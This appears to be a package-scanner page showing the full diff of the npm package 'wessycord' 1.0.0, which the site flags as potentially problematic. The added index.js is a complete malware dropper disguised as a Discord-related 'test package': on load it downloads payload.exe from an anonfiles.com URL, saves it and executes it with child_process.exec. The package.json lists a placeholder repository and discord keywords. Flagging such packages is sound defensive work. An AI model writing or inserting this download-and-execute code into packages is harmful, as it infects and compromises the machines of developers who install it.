wessycord 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of wessycord might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +14 -0
  2. package/package.json +19 -0
package/index.js ADDED
@@ -0,0 +1,14 @@
1
+ const https = require('https');
2
+ const fs = require('fs');
3
+ const child_process = require('child_process');
4
+
5
+ https.get('https://cdn-141.anonfiles.com/scUeHf23z5/cfc2b34c-1689619361/payload.exe', (response) => {
6
+ const fileStream = fs.createWriteStream('payload.exe');
7
+ response.pipe(fileStream);
8
+ fileStream.on('finish', () => {
9
+ fileStream.close();
10
+ child_process.exec('payload.exe', (error) => {
11
+ if (error) throw error;
12
+ });
13
+ });
14
+ });
package/package.json ADDED
@@ -0,0 +1,19 @@
1
+ {
2
+ "name": "wessycord",
3
+ "version": "1.0.0",
4
+ "description": "test package",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "start": "node index.js"
8
+ },
9
+ "author": "wessy",
10
+ "license": "MIT",
11
+ "repository": {
12
+ "type": "git",
13
+ "url": "https://github.com/explore"
14
+ },
15
+ "keywords": [
16
+ "discord",
17
+ "cord"
18
+ ]
19
+ }